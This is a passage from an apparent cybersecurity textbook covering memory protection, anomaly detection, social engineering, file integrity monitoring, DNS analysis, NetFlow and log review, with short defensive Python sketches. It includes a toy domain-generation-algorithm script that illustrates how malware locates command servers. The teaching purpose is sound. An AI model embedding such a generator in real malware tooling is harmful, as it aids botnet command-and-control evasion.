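h1 = hashlib.sha256(original).hexdigest()
h2 = hashlib.sha256(tweaked).hexdigest()

print(h1)
print(h2)
print("signature match" if h1 == h2 else
      "no match: the hash changed completely, hence fuzzy hashing")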
Reverse Engineering Tools
When examples of zero-day malware have been safely
sandboxed and must be analyzed or when a host has been
compromised and has been safely isolated and you would like to
identify details of the breach to be better prepared for the
future, reverse engineering tools are indicated. The Infosec
Institute recommends the following as the top reverse
engineering tools for cybersecurity professionals (as of January
2019):
Apktool: This third-party tool for reverse engineering can decode
resources to nearly original form and re-create them after making
some adjustments.
dex2jar: This lightweight API is designed to read the Dalvik
Executable (.dex/.odex) format. It is used with Android and Java
.class files.
diStorm3: This tool is lightweight, easy to use, and has a fast
decomposer library. It disassembles instructions in 16-, 32-, and
64-bit modes. It is also the fastest disassembler library. The source
code is very clean, readable, portable, and platform independent.
edb-debugger: This is the Linux equivalent of the famous OllyDbg
debugger on the Windows platform. One of the main goals of this
debugger is modularity.
Jad: This is one of the most popular Java decompilers ever written. It is a command-line utility written in C++.
Javasnoop: This Aspect Security tool allows security testers to test
the security of Java applications easily.
OllyDbg: This is a 32-bit, assembler-level analyzing debugger for
Microsoft Windows. Emphasis on binary code analysis makes it
particularly useful in cases where the source is unavailable.
Valgrind: This suite is for debugging and profiling Linux
programs.
Memory
A computing system needs somewhere to store information,
both on a long-term basis and a short-term basis. There are two
types of storage locations: memory, for temporary storage
needs, and long-term storage media. Information can be
accessed much faster from memory than from long-term
storage, which is why the most recently used instructions or
information is typically kept in cache memory for a short period
of time, which ensures the second and subsequent accesses will
be faster than returning to long-term memory. Computers can
have both random-access memory (RAM) and read-only
memory (ROM). RAM is volatile, meaning the information must
continually be refreshed and will be lost if the system shuts
down.
Memory Protection
In an information system, memory and storage are the most
important resources. Damaged or corrupt data in memory can
cause the system to stop functioning. Data in memory can be
disclosed and therefore must be protected. Memory does not
isolate running processes and threads from data. Security
professionals must use processor states, layering, process
isolation, abstraction, hardware segmentation, and data hiding
to help keep data isolated.
Most processors support two processor states: supervisor state
(or kernel mode) and problem state (or user mode). In
supervisor state, the highest privilege level on the system is used
so that the processor can access all the system hardware and
data. In problem state, the processor limits access to system
hardware and data. Processes running in supervisor state are
isolated from the processes that are not running in that state;
supervisor-state processes should be limited to only core
operating system functions.
A security professional can use layering to organize
programming into separate functions that interact in a
hierarchical manner. In most cases, each layer only has access
to the layers directly above and below it. Ring protection is the
most common implementation of layering, with the inner ring
(ring 0) being the most privileged ring and the outer ring (ring
3) being the lowest privileged. The OS kernel usually runs on
ring 0, and user applications usually run on ring 3.
A security professional can isolate processes by providing
memory address spaces for each process. Other processes are
unable to access address space allotted to another process.
Naming distinctions and virtual mapping are used as part of
process isolation.
Hardware segmentation works like process isolation. It prevents
access to information that belongs to a higher security level.
However, hardware segmentation enforces the policies using
physical hardware controls rather than the operating system’s
logical process isolation. Hardware segmentation is rare and is
usually restricted to governmental use, although some
organizations may choose to use this method to protect private
or confidential data. Data hiding prevents data at one security
level from being seen by processes operating at other security
levels.
Secured Memory
Memory can be divided into multiple partitions. Based on the
nature of data in a partition, the partition can be designated as a
security-sensitive or a non-security-sensitive partition. In a
security breach (such as tamper detection), the contents of a
security-sensitive partition can be erased by the controller itself,
while the contents of the non-security-sensitive partition can
remain unchanged (see Figure 11-3).
Runtime Data Integrity Check
The runtime data integrity check process ensures the
integrity of the peripheral memory contents during runtime
execution. The secure booting sequence generates a hash value
of the contents of individual memory blocks stored in secured
memory. In the runtime mode, the integrity checker reads the
contents of a memory block, waits for a specified period, and
then reads the contents of another memory block. In the
process, the checker also computes the hash values of the
memory blocks and compares them with the contents of the
reference file generated during boot time. In the event of a
mismatch between two hash values, the checker reports a
security intrusion to a central unit that decides the action to be
taken based on the security policy, as shown in Figure 11-4.
FIGURE 11-3 Secure Memory
Figure 11-4 Runtime Data Integrity Check
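A conceptual Python sketch of the checker loop follows. The memory “blocks” here are simple byte strings, and the reference dictionary stands in for the hash file generated during the secure booting sequence.

import hashlib
import time

def block_hash(data):
    return hashlib.sha256(data).hexdigest()

# Contents measured during secure boot (hypothetical blocks)
memory_blocks = {"block0": b"kernel code", "block1": b"driver code"}
reference = {name: block_hash(data) for name, data in memory_blocks.items()}

def integrity_check_pass(interval=0.1):
    for name, data in memory_blocks.items():
        if block_hash(data) != reference[name]:
            print(f"Intrusion reported for {name}")  # escalate per policy
        time.sleep(interval)  # wait before reading the next block

integrity_check_pass()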
Memory Dumping, Runtime Debugging
Many penetration testing tools perform an operation called a
core dump or memory dump. Applications store information
in memory, and this information can include sensitive data,
passwords, usernames, and encryption keys. Hackers can use
memory-reading tools to analyze the entire memory content
used by an application. Any vulnerability testing should take
this into consideration and utilize the same tools to identify any
issues in the memory of an application. The following are some
examples of memory-reading tools:
Memdump: This free tool runs on Windows, Linux, and Solaris. It
simply creates a bit-by-bit copy of the volatile memory on a system.
KnTTools: This memory acquisition and analysis tool used with
Windows systems captures physical memory and stores it to a
removable drive or sends it over the network to be archived on a
separate machine.
FATKit: This popular memory forensics tool automates the process
of extracting interesting data from volatile memory. FATKit helps
an analyst visualize the objects it finds to help in understanding the
data that the tool was able to find.
Runtime debugging, on the other hand, is the process of
using a programming tool to not only identify syntactic
problems in code but also discover weaknesses that can lead to
memory leaks and buffer overflows. Runtime debugging tools
operate by examining and monitoring the use of memory. These
tools are specific to the language in which the code was written.
Table 11-2 shows examples of runtime debugging tools and the
operating systems and languages for which they can be used.
Table 11-2 Runtime Debugging Tools

Tool | Operating Systems | Languages
AddressSanitizer | Linux, Mac | C, C++
Deleaker | Windows (Visual Studio) | C, C#
Software Verify | Windows | .NET, C, C++, Java, JavaScript, Lua, Python, Ruby
Memory dumping can help determine what a hacker might be
able to learn if she were able to cause a memory dump. Runtime
debugging would be the correct approach for discovering
syntactic problems in an application’s code or to identify other
issues, such as memory leaks or potential buffer overflows.
System and Application Behavior
Sometimes an application or system will provide evidence that
something is not quite right. With proper interpretation, these
behaviors can be used to alert one of the presence of malware or
an ongoing attack. It is useful to know what behavior is normal
and what is not.
Known-good Behavior
Describing abnormal behavior is perhaps simpler than
describing normal behavior, but it is possible to develop a performance baseline for a system that can be used to identify operations that fall outside of the normal range. A baseline is a
reference point that is defined and captured to be used as a
future reference. While capturing baselines is important, using
baselines to assess the security state is just as important. Even
the most comprehensive baselines are useless if they are never
used.
Baselines alone, however, cannot help you if you do not have
current benchmarks for comparison. A benchmark, which is a
point of reference later used for comparison, captures the same
data as a baseline and can even be used as a new baseline
should the need arise. A benchmark is compared to the baseline
to determine whether any security or performance issues exist.
Also, security professionals should keep in mind that
monitoring performance and capturing baselines and
benchmarks will affect the performance of the systems being
monitored.
Capturing both a baseline and a benchmark at the appropriate
time is important. Baselines should be captured when a system
is properly configured and fully updated. Also, baselines should
be assessed over a longer period of time, such as a week or a
month rather than just a day or an hour. When updates occur,
new baselines should be captured and compared to the previous
baselines. At that time, adopting new baselines on the most
recent data might be necessary.
Let’s look at an example. Suppose that your company’s security
and performance network has a baseline for each day of the
week. When the baselines were first captured, you noticed that
much more authentication occurs on Thursdays than on any
other day of the week. You were concerned about this until you
discovered that members of the sales team work remotely on all
days but Thursday and rarely log in to the authentication
system when they are not working in the office. For their remote
work, members of the sales team use their laptops and log in to
the VPN only when remotely submitting orders. On Thursday,
the entire sales team comes into the office and works on local
computers, ensuring that orders are being processed and
fulfilled as needed. The spike in authentication traffic on
Thursday is fully explained by the sales team’s visit. On the
other hand, if you later notice a spike in VPN traffic on
Thursdays, you should be concerned because the sales team is
working in the office on Thursdays and will not be using the
VPN.
For software developers, understanding baselines and
benchmarks also involves understanding thresholds, which
ensure that security issues do not progress beyond a configured
level. If software developers must develop measures to notify
system administrators prior to a security incident occurring, the
best method is to configure the software to send an alert, alarm,
or e-mail message when specific incidents pass the threshold.
Security professionals should capture baselines over different
times of day and days of the week to ensure that they can
properly recognize when possible issues occur. In addition,
security professionals should ensure that they are comparing
benchmarks to the appropriate baseline. Comparing a
benchmark from a Monday at 9 a.m. to a baseline from a
Saturday at 9 a.m. may not allow you to properly assess the
situation. Once you identify problem areas, you should develop
a possible solution to any issue that you discover.
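A hedged sketch of such a threshold check follows. The baseline figures, time slots, and notify_admin function are hypothetical; in practice the alert would go to e-mail or an alarm system.

# Hourly authentication counts captured when the system was known-good
baseline = {"mon_09": 120, "thu_09": 480}
THRESHOLD = 1.5  # alert when a benchmark exceeds 150% of its baseline

def notify_admin(message):
    print("ALERT:", message)  # stand-in for e-mail/alarm integration

def compare(slot, benchmark):
    if benchmark > baseline[slot] * THRESHOLD:
        notify_admin(f"{slot}: {benchmark} vs baseline {baseline[slot]}")

compare("mon_09", 410)  # fires: Monday traffic far above its baseline
compare("thu_09", 500)  # quiet: within the normal Thursday spike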
Anomalous Behavior
When an application is behaving strangely and not operating
normally, it could be that the application needs to be reinstalled
or that it has been compromised by malware in some way.
While all applications occasionally have issues, persistent issues
or issues that are typically not seen or have never been seen
could indicate a compromised application:
Introduction of new accounts: Some applications have their
own account database. In that case, you may find accounts that
didn’t previously exist in the database, which should be a cause for
alarm and investigation. Many application compromises create
accounts with administrative access for the use of a malicious
individual or for the processes operating on his behalf.
Unexpected output: When the output from a program is not
what is normally expected and when dialog boxes are altered or the
order in which the boxes are displayed is not correct, it is an
indication that the application has been altered. Reports of strange
output should be investigated.
Unexpected outbound communication: Any unexpected
outbound traffic should be investigated, regardless of whether it
was discovered as a result of network monitoring or as a result of
monitoring the host or application. With regard to the application,
it can mean that data is being transmitted back to the malicious
individual.
Service interruption: When an application stops functioning
with no apparent problem, or when an application cannot seem to
communicate in the case of a distributed application, it can be a
sign of a compromised application. Any such interruptions that
cannot be traced to an application, host, or network failure should
be investigated.
Memory overflows: Memory overflow occurs when an
application uses more memory than the operating system has
assigned to it. In some cases, it simply causes the system to run
slowly, as the application uses more and more memory. In other
cases, the issue is more serious. When it is a buffer overflow, the
intent may be to crash the system or execute commands.
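As promised in the new-accounts item above, here is a minimal Python sketch of that detection idea. It assumes a Linux host (accounts read from /etc/passwd) and a previously saved baseline file; the baseline filename is hypothetical:

def current_accounts():
    # Read local account names from /etc/passwd (Linux example).
    with open("/etc/passwd") as f:
        return {line.split(":")[0] for line in f if line.strip()}

def find_new_accounts(baseline_file="accounts.baseline"):
    # Compare the current account list against a previously saved baseline,
    # one account name per line.
    with open(baseline_file) as f:
        baseline = {line.strip() for line in f if line.strip()}
    unexpected = current_accounts() - baseline
    for account in sorted(unexpected):
        print(f"Investigate: account '{account}' was not in the baseline")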
Exploit Techniques
Endpoints such as desktops, laptops, printers, and smartphones
account for the highest percentage of devices on the network.
They are therefore common targets. These devices are subject to
a number of security issues, as discussed in the following
sections.
Social Engineering Threats
Social engineering attacks occur when attackers use believable
language to exploit user gullibility to obtain user credentials or
some other confidential information. Social engineering threats
that you should understand include phishing/pharming,
shoulder surfing, identity theft, and dumpster diving. The best
countermeasure against social engineering threats is to provide
user security awareness training. This training should be
required and must occur on a regular basis because social
engineering techniques evolve constantly. The following are the
most common social engineering threats:
Phishing/pharming: Phishing is a social engineering attack
using e-mail in which attackers try to learn personal information,
including credit card information and financial data. This type of
attack is usually carried out by implementing a fake website that
very closely resembles a legitimate website. Users enter data,
including credentials, on the fake website, allowing the attackers to
capture any information entered. Spear phishing is a phishing
attack carried out against a specific target by learning about the
target’s habits and likes. Spear phishing attacks take longer to carry
out than phishing attacks because of the information that must be
gathered.
Pharming is similar to phishing, but pharming actually pollutes the
contents of a computer’s DNS cache so that requests to a legitimate
site are actually routed to an alternate site.
Caution users against using any links embedded in e-mail
messages, even if a message appears to have come from a legitimate
entity. Users should also review the address bar any time they
access a site where their personal information is required, to ensure
that the site is correct and that SSL is being used, which is indicated
by an HTTPS designation at the beginning of the URL address.
Shoulder surfing: Occurs when an attacker watches a user enter
login or other confidential data. Encourage users to always be aware
of who is observing their actions. Implementing privacy screens
helps ensure that data entry cannot be recorded.
Identity theft: Occurs when someone obtains personal
information, including driver’s license number, bank account
number, and Social Security number, and uses that information to
assume the identity of the individual whose information was stolen.
After the identity is assumed, the attack can go in any direction. In
most cases, attackers open financial accounts in the user’s name.
Attackers also can gain access to the user’s valid accounts.
Dumpster diving: Occurs when attackers examine garbage
contents to obtain confidential information. This includes
personnel information, account login information, network
diagrams, and organizational financial data. Organizations should
implement policies for shredding documents that contain this
information.
Rogue Endpoints
As if keeping up with the devices you manage is not enough, you
also have to concern yourself with the possibility of rogue
devices on the network. Rogue endpoints are devices present
on your network that you do not control or manage. In some cases,
these devices are benign, as in the case of a user bringing his
son’s laptop to work and putting it on the network. In other
cases, rogue endpoints are placed by malicious individuals.
Rogue Access Points
Rogue access points are APs that you do not control and
manage. There are two types: those that are connected to your
wired infrastructure and those that are not. The ones that are
connected to your wired network present a danger to your wired
and wireless networks. They may be placed there by your own
users without your knowledge, or they may be purposefully put
there by a hacker to gain access to the wired network. In either
case, they allow access to your wired network. Wireless
intrusion prevention system (WIPS) devices can be used to
locate rogue access points and alert administrators to their
presence. Wireless site surveys can also be conducted to detect
such threats.
Servers
While servers represent a less significant number of devices
than endpoints, they usually contain the critical and sensitive
assets and perform mission-critical services for the network.
Therefore, these devices receive the lion’s share of attention
from malicious individuals. The following are some issues that
can impact any device but that are most commonly directed at
servers:
DoS/DDoS: A denial-of-service (DoS) attack occurs when
attackers flood a device with enough requests to degrade the
performance of the targeted device. Some popular DoS attacks
include SYN floods and teardrop attacks. A distributed DoS (DDoS)
attack is a DoS attack that is carried out from multiple attack
locations. Vulnerable devices are infected with software agents
called zombies. The vulnerable devices become a botnet, which then
carries out the attack. Because of the distributed nature of the
attack, identifying all the attacking bots is virtually impossible. The
botnet also helps hide the original source of the attack.
Buffer overflow: Buffers are portions of system memory that are
used to store information. A buffer overflow occurs when the
amount of data that is submitted to an application is larger than the
buffer can handle. Typically, this type of attack is possible because
of poorly written application or operating system code, and it can
result in an injection of malicious code. To protect against this
issue, organizations should ensure that all operating systems and
applications are updated with the latest service packs and patches.
In addition, programmers should properly test all applications to
check for overflow conditions. Finally, programmers should use
input validation to ensure that the data submitted is not too large
for the buffer. (A validation sketch follows this list.)
Mobile code: Mobile code is any software that is transmitted
across a network to be executed on a local system. Examples of
mobile code include Java applets, JavaScript code, and ActiveX
controls. Mobile code frameworks include security controls: Java
implements sandboxes, and ActiveX uses digital code signatures. Malicious
mobile code can be used to bypass access controls. Organizations
should ensure that users understand the security concerns related
to malicious mobile code. Users should only download mobile code
from legitimate sites and vendors.
Emanations: Emanations are electromagnetic signals that are
emitted by an electronic device. Attackers can target certain devices
or transmission media to eavesdrop on communication without
having physical access to the device or medium. The TEMPEST
program, initiated by the United States and United Kingdom,
researches ways to limit emanations and standardizes the
technologies used. Any equipment that meets TEMPEST standards
suppresses signal emanations using shielding material. Devices that
meet TEMPEST standards usually implement an outer barrier or
coating, called a Faraday cage or Faraday shield. TEMPEST devices
are most often used in government, military, and law enforcement
settings.
Backdoor/trapdoor: A backdoor, or trapdoor, is a mechanism
implemented in many devices or applications that gives the user
who uses the backdoor unlimited access to the device or
application. Privileged backdoor accounts are the most common
type of backdoor in use today. Most established vendors no longer
release devices or applications with this security issue. You should
be aware of any known backdoors in the devices or applications you
manage.
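To illustrate the input validation recommended in the buffer overflow item above: Python itself is memory safe, so the sketch below shows only the validation logic, with a hypothetical 256-byte limit standing in for the buffer size an application would allocate in a lower-level language:

MAX_INPUT_LEN = 256  # hypothetical capacity of the receiving buffer

def read_user_field(raw: bytes) -> bytes:
    # Reject input that exceeds the buffer the application allocates,
    # instead of letting excess bytes spill into adjacent memory.
    if len(raw) > MAX_INPUT_LEN:
        raise ValueError(f"input of {len(raw)} bytes exceeds the "
                         f"{MAX_INPUT_LEN}-byte limit")
    return raw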
Services
Services that run on both servers and workstations have
identities in the security system. They possess accounts called
system or service accounts that are built in, and they log on
when they operate, just as users do. They also possess privileges
and rights, and this is why security issues come up with these
accounts. These accounts typically possess many more
privileges than they actually need to perform the service. The
security issue is that if a malicious individual or process were
able to gain control of the service, the acquired rights would be
significant.
Therefore, it is important to apply the concept of least privilege
to these services by identifying the rights the services need and
limiting the services to only those rights. A common practice
has been to create a user account for the service that possesses
only the rights required and set the service to log on using that
account. You can do this in Windows by accessing the Log On
tab in the Properties dialog box of the service, as shown in
Figure 11-5. In this example, the Remote Desktop Service is set
to log on as a Network Service account. To limit this account,
you can create a new account either in the local machine or in
Active Directory, give the account the proper permissions, and
then click the Browse button, locate the account, and select it.
While this is a good approach, it involves some complications.
First is the difficulty of managing the account password. If the
domain in which the system resides has a policy that requires a
password change after 30 days and you don’t change the service
account password, the service will stop running.
Another complication involves the use of domain accounts.
While setting a service account as a domain account eliminates
the need to create an account for the service locally on each
server that runs the service, it introduces a larger security risk.
If that single domain service account were compromised, the
account would provide access to all servers running the service.
FIGURE 11-5 Log On Tab
Fortunately, beginning with Windows Server 2008 R2 (and
continuing in later systems such as Windows Server 2016 and
Windows Server 2019), Microsoft introduced the concept of
managed service accounts. Unlike with regular domain accounts,
for which administrators must reset passwords manually, the
network passwords for these accounts are reset automatically.
Windows Server 2012 introduced the concept of group managed
service accounts, which allow multiple servers to share the same
managed service account; this was not possible with Server 2008
R2. The account password is
managed by Windows Server domain controllers and can be
retrieved by multiple Windows Server systems in an Active
Directory environment.
File System
The file system can present some opportunities for mischief.
One of the prime targets are database servers. In many ways,
the database is the Holy Grail for an attacker. It is typically
where the sensitive information resides. When considering
database security, you need to understand the following terms:
Inference: Inference occurs when someone has access to
information at one level that allows her to infer information about
another level. The main mitigation technique for inference is
polyinstantiation, which is the development of a detailed version of
an object from another object using different values in the new
object. It prevents low-level database users from inferring the
existence of higher-level data.
Aggregation: Aggregation is defined as the assembling or
compilation of units of information at one sensitivity level and
having the resultant totality of data being of a higher sensitivity
level than the individual components. So you might think of
aggregation as a different way of achieving the same goal as
inference, which is to learn information about data on a level to
which one does not have access.
Contamination: Contamination is the intermingling or mixing of
data of one sensitivity or need-to-know level with that of another.
Proper implementation of security levels is the best defense against
these problems.
Data mining warehouse: A data mining warehouse is a
repository of information from heterogeneous databases. It allows
for multiple sources of data to not only be stored in one place but to
be organized in such a way that redundancy of data is reduced
(called data normalization). More sophisticated data mining tools are
used to manipulate the data to discover relationships that may not
have been apparent before. Along with the benefits they provide,
they also offer more security challenges.
File Integrity Monitoring
Many times, malicious software and malicious individuals make
unauthorized changes to files. In many cases these files are data
files, and in other cases they are system files. While alterations
to data files are undesirable, changes to system files can
compromise an entire system.
The solution is file integrity software that generates a hash value
of each system file and verifies that hash value at regular
intervals. This entire process is automated, and in some cases a
corrupted system file will automatically be replaced when
discovered.
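As a minimal sketch of how such a tool works, the following Python fragment builds a baseline of SHA-256 hashes for a set of files and later reports any file whose current hash no longer matches (the file paths and baseline filename are hypothetical):

import hashlib
import json

def hash_file(path):
    # Compute a SHA-256 digest of the file's contents in chunks.
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

def build_baseline(paths, baseline_file="hashes.json"):
    # Record the known-good hash of each monitored file.
    with open(baseline_file, "w") as f:
        json.dump({p: hash_file(p) for p in paths}, f)

def verify_baseline(baseline_file="hashes.json"):
    # Recompute each hash and report files that no longer match.
    with open(baseline_file) as f:
        baseline = json.load(f)
    for path, expected in baseline.items():
        if hash_file(path) != expected:
            print(f"Integrity check failed: {path}")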
While there are third-party tools such as Tripwire that do this,
Windows offers System File Checker (SFC) to do the same
thing. SFC is a command-line utility that checks and verifies the
versions of system files on a computer. If system files are
corrupted, SFC replaces the corrupted files with correct
versions. The syntax for the SFC command is as follows:
SFC [switch]
The switches vary a bit between different versions of Windows.
Table 11-3 lists the most common ones available for SFC.
Table 11-3 SFC Switches

/CACHESIZE=X: Sets the Windows File Protection cache size, in megabytes
/PURGECACHE: Purges the Windows File Protection cache and scans all protected system files immediately
/REVERT: Reverts SFC to its default operation
/SCANFILE (Windows 7 and Vista only): Scans a file that you specify and fixes problems if they are found
/SCANNOW: Immediately scans all protected system files
/SCANONCE: Scans all protected system files once
/SCANBOOT: Scans all protected system files every time the computer is rebooted
/VERIFYONLY: Scans protected system files but does not make any repairs or changes
/VERIFYFILE: Verifies the integrity of the file specified but does not make any repairs or changes
/OFFBOOTDIR: Specifies the offline boot directory to be repaired
/OFFWINDIR: Specifies the offline Windows directory to be repaired
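For example, to scan all protected system files immediately, run the following from an elevated command prompt:

sfc /scannow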
User and Entity Behavior Analytics (UEBA)
Behavioral analysis, another term for anomaly analysis,
observes network behaviors for anomalies. It can be
implemented using combinations of the scanning types already
covered, including NetFlow, protocol, and packet analysis to
create a baseline and subsequently report departures from the
traffic metrics found in the baseline. One of the newer advances
in this field is the development of user and entity behavior
analytics (UEBA). This type of analysis focuses on user
activities. Combining behavior analysis with machine learning,
UEBA enhances the ability to determine which particular users
are behaving oddly. An example would be a hacker who has
stolen credentials of a user and is identified by the system
because he is not performing the same activities that the user
would perform.
NETWORK
Sometimes our focus is not on endpoints or on individual
application behavior, but on network activity. Let’s look at some
types of analysis that relate to network traffic.
Uniform Resource Locator (URL) and Domain Name
System (DNS) Analysis
Malicious individuals can make use of both DNS records and
URLs to redirect network traffic in a way that benefits them.
Also, some techniques used to shorten URLs (to make them less
likely to malfunction) have resulted in the following:
Allowing spammers to sidestep spam filters as domain names like
TinyURL are automatically trusted
Preventing educated users from checking for suspect URLs by
obfuscating the actual website URL
Redirecting users to phishing sites to capture sensitive personal
information
Redirecting users to malicious sites loaded with drive-by droppers,
just waiting to download malware
Tools that can be used to analyze URLs include the following:
urlQuery is a free online service for testing and analyzing URLs,
helping with identification of malicious content on websites.
URLVoid is a free service developed by NoVirusThanks Company
that allows users to scan a website address (such as google.com or
youtube.com) with multiple website reputation engines and domain
blacklists to facilitate the detection of possible dangerous websites.
DNS Analysis
DNS provides a hierarchical naming system for computers,
services, and any resources connected to the Internet or a
private network. You should enable Domain Name System
Security Extensions (DNSSEC) to ensure that a DNS server is
authenticated before the transfer of DNS information begins
between the DNS server and the client. Transaction Signature
(TSIG) is a cryptographic mechanism, often deployed alongside
DNSSEC, that authenticates dynamic DNS updates, such as a
client updating its resource records when its IP address or
hostname changes. The TSIG record is used to validate the DNS
client.
As a security measure, you can configure internal DNS servers
to communicate only with root servers. This configuration
prevents the internal DNS servers from communicating with
any other external DNS servers.
The Start of Authority (SOA) contains the information
regarding a DNS zone’s authoritative server. A DNS record’s
Time to Live (TTL) determines how long a DNS record will live
before it needs to be refreshed. When a record’s TTL expires,
the record is removed from the DNS cache. Poisoning the DNS
cache involves inserting false records into that cache. If you use
a longer TTL, the resource record is refreshed less frequently and
therefore is less likely to be poisoned.
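As a quick illustration, you can inspect the TTL a zone assigns to a record. This sketch uses the third-party dnspython library (an assumption; install it with pip install dnspython, version 2.0 or later for the resolve() call), and example.com is a placeholder:

import dns.resolver  # third-party library: pip install dnspython

def show_ttl(name, rdtype="A"):
    # Query the record and report the TTL assigned by the zone.
    answer = dns.resolver.resolve(name, rdtype)
    print(f"{name} {rdtype} TTL = {answer.rrset.ttl} seconds")
    for rr in answer:
        print(f"  {rr}")

show_ttl("example.com")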
Let’s look at a security issue that involves DNS. Suppose an IT
administrator installs new DNS name servers that host the
company mail exchanger (MX) records and resolve the web
server’s public address. To secure the zone transfer between the
DNS servers, the administrator uses only server ACLs.
However, any secondary DNS servers would still be susceptible
to IP spoofing attacks.
Another scenario could occur when a security team determines
that someone from outside the organization has obtained
sensitive information about the internal organization by
querying the company’s external DNS server. The security
manager should address the problem by implementing a split
DNS server, allowing the external DNS server to contain only
information about domains that the outside world should be
aware of and enabling the internal DNS server to maintain
authoritative records for internal systems.
Domain Generation Algorithm
A domain generation algorithm (DGA) is used by
attackers to periodically generate large numbers of domain
names that can be used as rendezvous points with their
command and control servers. Detection efforts consist of using
cumbersome blacklists that must be updated often. Figure 11-6
illustrates the use of a DGA.
FIGURE 11-6 Domain Generation Algorithm
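To make the concept concrete, the following toy Python sketch shows the flavor of a DGA: the malware and its operator can independently derive the same candidate domains from a shared seed and the current date. The seed, hash choice, and domain count here are purely illustrative:

import hashlib
from datetime import date

def generate_domains(seed: str, day: date, count: int = 5):
    # Derive deterministic pseudo-random domains from a shared seed
    # and the current date; the attacker registers only one of them,
    # but the bot tries them all until one resolves.
    domains = []
    for i in range(count):
        material = f"{seed}-{day.isoformat()}-{i}".encode()
        digest = hashlib.md5(material).hexdigest()
        domains.append(digest[:12] + ".com")
    return domains

print(generate_domains("botnet-seed", date.today()))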
Flow Analysis
To protect data during transmission, security practitioners
should identify confidential and private information. Once this
data has been properly identified, the following flow analysis
steps should occur:
Step 1. Determine which applications and services access the
information.
Step 2. Document where the information is stored.
Step 3. Document which security controls protect the stored
information.
Step 4. Determine how the information is transmitted.
Step 5. Analyze whether authentication is used when
accessing the information. If it is, determine whether
the authentication information is securely transmitted.
If it is not, determine whether authentication can be
used.
Step 6. Analyze enterprise password policies, including
password length, password complexity, and password
expiration.
Step 7. Determine whether encryption is used to transmit
data. If it is, ensure that the level of encryption is
appropriate and that the encryption algorithm is
adequate. If it is not, determine whether encryption
can be used.
Step 8. Ensure that the encryption keys are protected.
Security practitioners should adhere to the defense-in-depth
principle to ensure that the CIA of data is ensured across its
entire life cycle. Applications and services should be analyzed to
determine whether more secure alternatives can be used or
whether inadequate security controls are deployed. Data at rest
may require encryption to provide full protection and
appropriate ACLs to ensure that only authorized users have
access. For data transmission, secure protocols and encryption
should be employed to prevent unauthorized users from being
able to intercept and read data. The most secure level of
authentication possible should be used in the enterprise.
Appropriate password and account policies can protect against
possible password attacks.
Finally, security practitioners should ensure that confidential
and private information is isolated from other information,
including locating the information on separate physical servers
and isolating data using virtual LANs (VLANs). Disable all
unnecessary services, protocols, and accounts on all devices.
Make sure that all firmware, operating systems, and
applications are kept up to date, based on vendor
recommendations and releases.
When new technologies are deployed based on the changing
business needs of the organization, security practitioners should
be diligent to ensure that they understand all the security
implications and issues with the new technology. Deploying a
new technology before proper security analysis has occurred can
result in security breaches that affect more than just the newly
deployed technology. Remember that changes are inevitable!
How you analyze and plan for these changes is what will set you
apart from other security professionals.
NetFlow Analysis
NetFlow is a technology developed by Cisco that is supported
by all major vendors and can be used to collect and
subsequently export IP traffic accounting information. The
traffic information is exported using UDP packets to a NetFlow
analyzer, which can organize the information in useful ways. It
exports records of individual one-way transmissions called
flows. When NetFlow is configured on a router interface, all
packets that are part of the same flow share the following
characteristics:
IP source address
IP destination address
Source port
Destination port
Layer 3 protocol type
Class of service (ToS byte)
Router or switch input interface
Figure 11-7 shows the types of questions that can be answered
by using the NetFlow information.
When the flow information is received by the analyzer, it is
organized and can then be used to identify the following:
The top protocols in use
The top talkers in the network
Traffic patterns throughout the day
In the example in Figure 11-8, the SolarWinds NetFlow Traffic
Analyzer displays the top talking endpoints over the past hour.
FIGURE 11-7 Using NetFlow Data
Figure 11-8 NetFlow Data
There are a number of tools that can be used to perform flow
analysis. Many of these tools are discussed in the next section.
Packet and Protocol Analysis
Point-in-time analysis captures data over a specified period of
time and thus provides a snapshot of the situation at that point
in time or across the specified time period. The types of analysis
described in this section involve capturing the information and
then analyzing it. Although these types of analysis all require
different tools or processes, they all follow this paradigm.
Packet Analysis
Packet analysis examines an entire packet, including the
payload. Its subset, protocol analysis, described next, is
concerned only with the information in the header of the
packet. In many cases, payload analysis is done when issues
cannot be resolved by observing the header. While the header is
only concerned with the information used to get the packet from
its source to its destination, the payload is the actual data being
communicated. When performance issues are occurring, and
there is no sign of issues in the header, looking into the payload
may reveal error messages related to the application in use that
do not present in the header. From a security standpoint,
examining the payload can reveal data that is unencrypted that
should be encrypted. It also can reveal sensitive information
that should not be leaving the network. Finally, some attacks
can be recognized by examining the application commands and
requests within the payload.
Protocol Analysis
As you just learned, protocol analysis is a subset of packet
analysis, and it involves examining information in the header of
a packet. Protocol analyzers examine these headers for
information such as the protocol in use and details involving the
communication process, such as source and destination IP
addresses and source and destination MAC addresses. From a
security standpoint, these headers can also be used to
determine whether the communication rules of the protocol are
being followed.
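As a small illustration of protocol analysis, the following sketch uses the third-party Scapy library (an assumption; install it with pip install scapy) to print header fields, without touching the payload, from a hypothetical capture file:

from scapy.all import rdpcap, IP, TCP  # third-party: pip install scapy

packets = rdpcap("capture.pcap")  # hypothetical capture file
for pkt in packets:
    if IP in pkt and TCP in pkt:
        # Protocol analysis: header fields only, no payload inspection.
        print(f"{pkt[IP].src}:{pkt[TCP].sport} -> "
              f"{pkt[IP].dst}:{pkt[TCP].dport} flags={pkt[TCP].flags}")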
Malware
The handling of malware was covered earlier in this chapter and
is covered further in Chapter 12.
LOG REVIEW
While automated systems can certainly make log review easier,
these tools are not available to all cybersecurity analysts, and
they do not always catch everything. In some cases, manual log
review must still be done. The following sections look at how log
analysis is performed in the typical logs that relate to security.
Event Logs
Event logs can include security events, but other types of event
logs exist as well. Figure 11-9 shows the Windows System log,
which includes operating system events. The view has been
filtered to show only error events. Error messages indicate that
something did not work, warnings indicate a lesser issue, and
informational events are normal operations.
Figure 11-9 System Log in Event Viewer
System logs record regular system events, including operating
system and service events. Audit and security logs record
successful and failed attempts to perform certain actions and
require that security professionals specifically configure the
actions that are audited. Organizations should establish policies
regarding the collection, storage, and security of these logs. In
most cases, the logs can be configured to trigger alerts when
certain events occur. In addition, these logs must be periodically
and systematically reviewed. Cybersecurity analysts should be
trained on how to use these logs to detect when incidents have
occurred. Having all the information in the world is no help if
personnel do not have the appropriate skills to analyze it.
For large enterprises, the amount of log data that needs to be
analyzed can be quite large. For this reason, many organizations
implement a SIEM device, which provides an automated
solution for analyzing events and deciding where the attention
needs to be given.
Suppose an intrusion detection system (IDS) logged an attack
attempt from a remote IP address. One week later, the attacker
